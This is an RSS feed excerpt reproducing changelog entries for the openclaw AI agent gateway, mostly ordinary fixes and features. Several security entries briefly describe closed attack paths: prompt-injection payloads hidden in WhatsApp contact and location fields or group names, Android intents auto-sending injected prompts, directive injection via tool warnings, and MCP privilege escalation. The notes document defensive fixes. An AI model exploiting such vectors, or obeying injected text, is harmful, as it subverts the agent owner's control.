<li>Plugins/install: link the host OpenClaw package into external plugins that declare <code>openclaw</code> as a peer dependency, so peer-only plugin SDK imports resolve after install without bundling a duplicate host package. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313294513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70462" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70462/hovercard" href="https://github.com/openclaw/openclaw/pull/70462">#70462</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anishesg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anishesg">@anishesg</a>.</li>
<li>Plugins/Windows: refresh the packaged plugin SDK alias in place during bundled runtime dependency repair, so gateway and CLI plugin startup no longer race on <code>ENOTEMPTY</code>/<code>EPERM</code> after same-guest npm updates.</li>
<li>Teams/security: require shared Bot Framework audience tokens to name the configured Teams app via verified <code>appid</code> or <code>azp</code>, blocking cross-bot token replay on the global audience. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317946331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70724/hovercard" href="https://github.com/openclaw/openclaw/pull/70724">#70724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: resolve bundled plugin Jiti loads relative to the target plugin module instead of the central loader, so Bun global installs no longer hang while discovering bundled image providers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307757270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70073/hovercard" href="https://github.com/openclaw/openclaw/pull/70073">#70073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidianyiko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidianyiko">@yidianyiko</a>.</li>
<li>Anthropic/CLI security: derive Claude CLI <code>bypassPermissions</code> from OpenClaw's existing YOLO exec policy, preserve explicit raw Claude <code>--permission-mode</code> overrides, and strip malformed permission-mode args instead of silently falling back to a bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317943033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70723/hovercard" href="https://github.com/openclaw/openclaw/pull/70723">#70723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: require loopback-only cleartext gateway connections on Android manual and scanned routes, so private-LAN and link-local <code>ws://</code> endpoints now fail closed unless TLS is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317940763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70722/hovercard" href="https://github.com/openclaw/openclaw/pull/70722">#70722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Pairing/security: require private-IP or loopback hosts for cleartext mobile pairing, and stop treating <code>.local</code> or dotless hostnames as safe cleartext endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317933544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70721/hovercard" href="https://github.com/openclaw/openclaw/pull/70721">#70721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/security: stop setup-api lookup from falling back to the launch directory, so workspace-local <code>extensions/&lt;plugin&gt;/setup-api.*</code> files cannot be executed during provider setup resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317905776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70718/hovercard" href="https://github.com/openclaw/openclaw/pull/70718">#70718</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Approvals/security: require explicit chat exec-approval enablement instead of auto-enabling approval clients just because approvers resolve from config or owner allowlists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317765259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70715/hovercard" href="https://github.com/openclaw/openclaw/pull/70715">#70715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/security: keep native slash-command channel policy from bypassing configured owner or member restrictions, while preserving channel-policy fallback when no stricter access rule exists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317763069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70711" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70711/hovercard" href="https://github.com/openclaw/openclaw/pull/70711">#70711</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: stop <code>ASK_OPENCLAW</code> intents from auto-sending injected prompts, so external app actions only prefill the draft instead of dispatching it immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317764736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70714/hovercard" href="https://github.com/openclaw/openclaw/pull/70714">#70714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Secrets/Windows: strip UTF-8 BOMs from file-backed secrets and keep unavailable ACL checks fail-closed unless trusted file or exec providers explicitly opt into <code>allowInsecurePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317129545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70662" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70662/hovercard" href="https://github.com/openclaw/openclaw/pull/70662">#70662</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>Agents/image generation: escape ignored override values in tool warnings so parsed <code>MEDIA:</code> directives cannot be injected through unsupported model options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317762579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70710" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70710/hovercard" href="https://github.com/openclaw/openclaw/pull/70710">#70710</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot/security: require framework auth for <code>/bot-approve</code> so unauthorized QQ senders cannot change exec approval settings through the unauthenticated pre-dispatch slash-command path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317735442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70706/hovercard" href="https://github.com/openclaw/openclaw/pull/70706">#70706</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/tools: stop the ACPX OpenClaw tools bridge from listing or invoking owner-only tools such as <code>cron</code>, closing a privilege-escalation path for non-owner MCP callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317612919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70698" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70698/hovercard" href="https://github.com/openclaw/openclaw/pull/70698">#70698</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/onboarding: load Feishu setup surfaces through a setup-only barrel so first-run setup no longer imports Feishu's Lark SDK before bundled runtime deps are staged. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311786128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70339" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70339/hovercard" href="https://github.com/openclaw/openclaw/pull/70339">#70339</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrejtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrejtr">@andrejtr</a>.</li>
<li>Approvals/startup: let native approval handlers report ready after gateway authentication while replaying pending approvals in the background, so slow or failing replay delivery no longer blocks handler startup or amplifies reconnect storms.</li>
<li>WhatsApp/security: keep contact/vCard/location structured-object free text out of the inline message body and render it through fenced untrusted metadata JSON, limiting hidden prompt-injection payloads in names, phone fields, and location labels/comments.</li>
<li>Group-chat/security: keep channel-sourced group names and participant labels out of inline group system prompts and render them through fenced untrusted metadata JSON.</li>
<li>Agents/replay: preserve Kimi-style <code>functions.&lt;name&gt;:&lt;index&gt;</code> tool-call IDs during strict replay sanitization so custom OpenAI-compatible Kimi routes keep multi-turn tool use intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317536165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70693/hovercard" href="https://github.com/openclaw/openclaw/pull/70693">#70693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geri4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geri4">@geri4</a>.</li>
<li>Discord/replies: preserve final reply permission context through outbound delivery so Discord replies keep the same channel/member routing rules at send time.</li>
<li>Plugins/startup: restore bundled plugin <code>openclaw/plugin-sdk/*</code> resolution from packaged installs and external runtime-deps stage roots, so Telegram/Discord no longer crash-loop with <code>Cannot find package 'openclaw'</code> after missing dependency repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319745436" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70852" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70852/hovercard" href="https://github.com/openclaw/openclaw/pull/70852">#70852</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonemacario/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonemacario">@simonemacario</a>.</li>
<li>CLI/Claude: run the same prompt-build hooks and trigger/channel context on <code>claude-cli</code> turns as on direct embedded runs, keeping Claude Code sessions aligned with OpenClaw workspace identity, routing, and hook-driven prompt mutations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316475365" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70625" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70625/hovercard" href="https://github.com/openclaw/openclaw/pull/70625">#70625</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Discord/plugin startup: keep subagent hooks lazy behind Discord's channel entry so packaged entry imports stay narrow and report import failures with the channel id and entry path.</li>
<li>Memory/doctor: keep root durable memory canonicalized on <code>MEMORY.md</code>, stop treating lowercase <code>memory.md</code> as a runtime fallback, and let <code>openclaw doctor --fix</code> merge true split-brain root files into <code>MEMORY.md</code> with a backup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316390163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70621/hovercard" href="https://github.com/openclaw/openclaw/pull/70621">#70621</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Providers/Anthropic Vertex: restore ADC-backed model discovery after the lightweight provider-discovery path by resolving emitted discovery entries, exposing synthetic auth on bootstrap discovery, and honoring copied env snapshots when probing the default GCP ADC path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251357682" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65715/hovercard" href="https://github.com/openclaw/openclaw/issues/65715">#65715</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251358554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65716/hovercard" href="https://github.com/openclaw/openclaw/pull/65716">#65716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feiskyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feiskyer">@feiskyer</a>.</li>
<li>Codex harness/status: pin embedded harness selection per session, show active non-PI harness ids such as <code>codex</code> in <code>/status</code>, and keep legacy transcripts on PI until <code>/new</code> or <code>/reset</code> so config changes cannot hot-switch existing sessions.</li>
<li>Gateway/security: fail closed on agent-driven <code>gateway config.apply</code>/<code>config.patch</code> runtime edits by allowlisting a narrow set of agent-tunable prompt, model, and mention-gating paths (including Telegram topic-level <code>requireMention</code>) instead of relying on a hand-maintained denylist of protected subtrees that could miss new sensitive config keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317956002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70726/hovercard" href="https://github.com/openclaw/openclaw/pull/70726">#70726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Webhooks/security: re-resolve <code>SecretRef</code>-backed webhook route secrets on each request so <code>openclaw secrets reload</code> revokes the previous secret immediately instead of waiting for a gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317967302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70727" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70727/hovercard" href="https://github.com/openclaw/openclaw/pull/70727">#70727</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Memory/dreaming: decouple the managed dreaming cron from heartbeat by running it as an isolated lightweight agent turn, so dreaming runs even when heartbeat is disabled for the default agent and is no longer skipped by <code>heartbeat.activeHours</code>. <code>openclaw doctor --fix</code> migrates stale main-session dreaming jobs in persisted cron configs to the new shape. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304626834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69811" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69811/hovercard" href="https://github.com/openclaw/openclaw/issues/69811">#69811</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271783037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67397" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67397/hovercard" href="https://github.com/openclaw/openclaw/issues/67397">#67397</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291011689" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68972" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68972/hovercard" href="https://github.com/openclaw/openclaw/issues/68972">#68972</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318151876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70737/hovercard" href="https://github.com/openclaw/openclaw/pull/70737">#70737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Agents/CLI: keep <code>--agent</code> plus <code>--session-id</code> lookup scoped to the requested agent store, so explicit agent resumes cannot select another agent's session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321202277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70985" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70985/hovercard" href="https://github.com/openclaw/openclaw/pull/70985">#70985</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.23-beta.4]]></title>
<description><![CDATA[Changes

Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so openai/gpt-image-2 works without an OPENAI_API_KEY. Fixes #70703.
Providers/OpenRouter: add image generation and reference-image editing through image_generate, so OpenRouter image models work with...]]></description>
<link>https://tsecurity.de/de/3460953/downloads/openclaw-2026423-beta4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460953/downloads/openclaw-2026423-beta4/</guid>
<pubDate>Fri, 24 Apr 2026 12:30:33 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Changes</h3>
<ul>
<li>Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so <code>openai/gpt-image-2</code> works without an <code>OPENAI_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317685103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70703/hovercard" href="https://github.com/openclaw/openclaw/issues/70703">#70703</a>.</li>
<li>Providers/OpenRouter: add image generation and reference-image editing through <code>image_generate</code>, so OpenRouter image models work with <code>OPENROUTER_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4142164318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55066" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55066/hovercard" href="https://github.com/openclaw/openclaw/issues/55066">#55066</a> via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275765906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67668" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67668/hovercard" href="https://github.com/openclaw/openclaw/pull/67668">#67668</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/notamicrodose/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/notamicrodose">@notamicrodose</a>.</li>
<li>Image generation: let agents request provider-supported quality and output format hints, and pass OpenAI-specific background, moderation, compression, and user hints through the <code>image_generate</code> tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313875031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70503/hovercard" href="https://github.com/openclaw/openclaw/pull/70503">#70503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>.</li>
<li>Agents/subagents: add optional forked context for native <code>sessions_spawn</code> runs so agents can let a child inherit the requester transcript when needed, while keeping clean isolated sessions as the default; includes prompt guidance, context-engine hook metadata, docs, and QA coverage.</li>
<li>Agents/tools: add optional per-call <code>timeoutMs</code> support for image, video, music, and TTS generation tools so agents can extend provider request timeouts only when a specific generation needs it.</li>
<li>Memory/local embeddings: add configurable <code>memorySearch.local.contextSize</code> with a 4096 default so local embedding contexts can be tuned for constrained hosts without patching the memory host. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314612454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70544/hovercard" href="https://github.com/openclaw/openclaw/pull/70544">#70544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aalekh-sarvam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aalekh-sarvam">@aalekh-sarvam</a>.</li>
<li>Dependencies/Pi: update bundled Pi packages to <code>0.70.0</code>, use Pi's upstream <code>gpt-5.5</code> catalog metadata for OpenAI and OpenAI Codex, and keep only local <code>gpt-5.5-pro</code> forward-compat handling.</li>
<li>Codex harness: add structured debug logging for embedded harness selection decisions so <code>/status</code> stays simple while gateway logs explain auto-selection and Pi fallback reasons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318523130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70760/hovercard" href="https://github.com/openclaw/openclaw/pull/70760">#70760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Codex harness: route native <code>request_user_input</code> prompts back to the originating chat, preserve queued follow-up answers, and honor newer app-server command approval amendment decisions.</li>
<li>Codex harness/context-engine: redact context-engine assembly failures before logging, so fallback warnings do not serialize raw error objects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319234861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70809/hovercard" href="https://github.com/openclaw/openclaw/pull/70809">#70809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>WhatsApp/onboarding: keep first-run setup entry loading off the Baileys runtime dependency path, so packaged QuickStart installs can show WhatsApp setup before runtime deps are staged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320441218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70932/hovercard" href="https://github.com/openclaw/openclaw/issues/70932">#70932</a>.</li>
<li>Block streaming: suppress final assembled text after partial block-delivery aborts when the already-sent text chunks exactly cover the final reply, preventing duplicate replies without dropping unrelated short messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320362931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70921/hovercard" href="https://github.com/openclaw/openclaw/issues/70921">#70921</a>.</li>
<li>Codex harness/Windows: resolve npm-installed <code>codex.cmd</code> shims through PATHEXT before starting the native app-server, so <code>codex/*</code> models work without a manual <code>.exe</code> shim. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320274139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70913/hovercard" href="https://github.com/openclaw/openclaw/issues/70913">#70913</a>.</li>
<li>Slack/groups: classify MPIM group DMs as group chat context and suppress verbose tool/plan progress on Slack non-DM surfaces, so internal "Working…" traces no longer leak into rooms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320271144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70912/hovercard" href="https://github.com/openclaw/openclaw/issues/70912">#70912</a>.</li>
<li>Agents/replay: stop OpenAI/Codex transcript replay from synthesizing missing tool results while still preserving synthetic repair on Anthropic, Gemini, and Bedrock transport-owned sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208825313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61556/hovercard" href="https://github.com/openclaw/openclaw/pull/61556">#61556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VictorJeon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VictorJeon">@VictorJeon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram/media replies: parse remote markdown image syntax into outbound media payloads on the final reply path, so Telegram group chats stop falling back to plain-text image URLs when the model or a tool emits <code>![...](...)</code> instead of a <code>MEDIA:</code> token. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258333933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66191" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66191/hovercard" href="https://github.com/openclaw/openclaw/issues/66191">#66191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apezam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apezam">@apezam</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/WebChat: surface non-retryable provider failures such as billing, auth, and rate-limit errors from the embedded runner instead of logging <code>surface_error</code> and leaving webchat with no rendered error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308345521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70124" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70124/hovercard" href="https://github.com/openclaw/openclaw/issues/70124">#70124</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319670589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70848" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70848/hovercard" href="https://github.com/openclaw/openclaw/pull/70848">#70848</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/truffle-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/truffle-dev">@truffle-dev</a>.</li>
<li>WhatsApp: unify outbound media normalization across direct sends and auto-replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
